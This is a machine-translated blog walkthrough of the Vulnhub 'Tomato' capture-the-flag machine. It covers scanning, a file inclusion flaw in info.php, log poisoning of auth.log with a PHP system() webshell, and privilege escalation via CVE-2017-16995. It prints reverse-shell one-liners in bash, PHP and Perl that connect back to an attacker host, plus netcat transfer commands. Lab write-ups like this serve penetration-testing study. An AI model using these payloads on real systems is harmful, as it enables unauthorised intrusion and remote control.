当前位置:网站首页>Vulnhub's Tomato (tomato)
Vulnhub's Tomato (tomato)
2022-07-03 11:52:00 【Plum_ Flowers_ seven】
Catalog
3、 ... and 、 Service version discovery
5、 ... and 、 Expand supply side scanning catalogue
1.dirsearch General dictionary
6、 ... and 、/antibot_image information gathering
Nine 、 Kernel vulnerability enumeration rights
1. Tools linux-exploit-suggester
One 、 The host found
Two 、 Port scanning
3、 ... and 、 Service version discovery
Open two http Service port , The middleware used is different .
21 Port deployment ftp
2211 Port deployment ssh service
I also know that this is unbuntu System .
Four 、 information gathering
1.80
Sure enough, it's a big tomato , Check the source code regularly , Useful business information
2.8888
Login box , The most classic attempt , Weak password . Can't succeed
5、 ... and 、 Expand supply side scanning catalogue
1.dirsearch General dictionary
Nothing , Change a big dictionary dirsearch Run very slowly , So change gobuster
2.gobuster
Is based on go Language development , Fast
gobuster dir -u http://192.168.0.101 -w /usr/share/seclists/Discovery/Web-Content/common.txt
301 The status code attracts our attention
6、 ... and 、/antibot_image information gathering
1. Judging from the image, the anti crawler application in the server deployment
2.info.php file
So that's one phpinfo file , There is switch configuration information , Server environment , Configuration file directory, etc
3.info.php File source code
There is information leakage in the comments , It's obviously a include The file contains functions
7、 ... and 、 File contains
1. Parameter contains the local file
2. For remote files, include
Practice : stay kali Create a php file , To remotely include , Failure
Conditions : Simply speaking long-range
File contains , It can contain files on other hosts , And as php Code execution .
To achieve long-range
If the file contains ,php Configured allow_url_include = on
It has to be for on( Turn on )
This is from phpinfo It can also be seen in . He didn't drive
3. View the private key through File Inclusion Vulnerability
Failure , He didn't /home/tomato/.ssh/id_rsa
4. see ubuntu Log files
/var/log/auth.log
This log is unbuntu The default log of login failure . So we can use ssh perhaps ftp Login failure injection code .
5. test
ssh [email protected] -p 2211
Sure enough, we entered aaaaaaaaaaaa All appear on it , Change him into a Trojan horse
6. Write the command to execute the Trojan horse to the log
<?php echo system($_GET['cc'])?>
When writing this ,php The code does not show , Prove that the server exists php Running environment , The injection script parses normally
7. Parameter test
view-source:http://192.168.0.101/antibot_image/antibots/info.php?image=/var/log/auth.log&cc=id
8、 ... and 、 rebound shell
The use of python Rebound success
1.bash
bash -i >& /dev/tcp/192.168.0.104/4444 0>&1
2.php
php -r '$sock=fsockopen(" Control terminal ip", Control end port );exec("/bin/bash -i <&3 >&3 2>&3");'
3.perl
perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"192.168.0.104:7777");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'
Nine 、 Kernel vulnerability enumeration rights
1. Tools linux-exploit-suggester
sudo apt install linux-exploit-suggester
2. Transmission tools
Server side :
nc -nvlp 4444 > 1.sh
client :
nc 192.168.0.101 4444 < linux-exploit-suggester.sh -w 1
3. Try one by one
Ten 、CVE-2017-16995
stay kali End use gcc After compiling ,nc Upload , Give authority , Finally, execute .
边栏推荐
- Web安全总结
- Cacti监控Redis实现过程
- 2022年湖南工学院ACM集训第二次周测题解
- PHP基础
- ftp登录时,报错“530 Login incorrect.Login failed”
- The tutor put forward 20 pieces of advice to help graduate students successfully complete their studies: first, don't plan to take a vacation
- POI excel cell wrap
- Go language to realize static server
- The excel table is transferred to word, and the table does not exceed the edge paper range
- 导师对帮助研究生顺利完成学业提出了20条劝告:第一,不要有度假休息的打算.....
猜你喜欢
Duplicate numbers in the array of sword finger offer 03
Visual Studio 2022下载及配置OpenCV4.5.5
Qt+VTK+OCCT读取IGES/STEP模型
Hongmeng fourth training
rxjs Observable filter Operator 的实现原理介绍
STL Tutorial 9 deep copy and shallow copy of container elements
PHP基础
vulnhub之GeminiInc v2
vulnhub之tomato(西红柿)
Numpy np. Max and np Maximum implements the relu function
随机推荐
Extrapolated scatter data
Vulnhub geminiinc V2
Hongmeng fourth training
Web security summary
AI模型看看视频,就学会了玩《我的世界》:砍树、造箱子、制作石镐样样不差...
Deploying WordPress instance tutorial under coreos
R语言使用gridExtra包的grid.arrange函数将lattice包的多个可视化图像横向组合起来,ncol参数自定义组合图列数、nrow参数自定义组合图行数
在CoreOS下部署WordPress实例教程
2022 northeast four provinces match VP record / supplementary questions
R语言ggplot2可视化:gganimate包创建动态折线图动画(gif)、使用transition_reveal函数在动画中沿给定维度逐步显示数据、在折线移动方向添加数据点
vulnhub之narak
phpcms 提示信息页面跳转showmessage
vulnhub之tomato(西红柿)
Yintai department store ignites the city's "night economy"
Cadence background color setting
2022年中南大学夏令营面试经验
How should intermediate software designers prepare for the soft test
Go语言实现静态服务器
Raven2 of vulnhub
R language ggplot2 visualization: gganimate package creates dynamic line graph animation (GIF) and uses transition_ The reveal function displays data step by step along a given dimension in the animat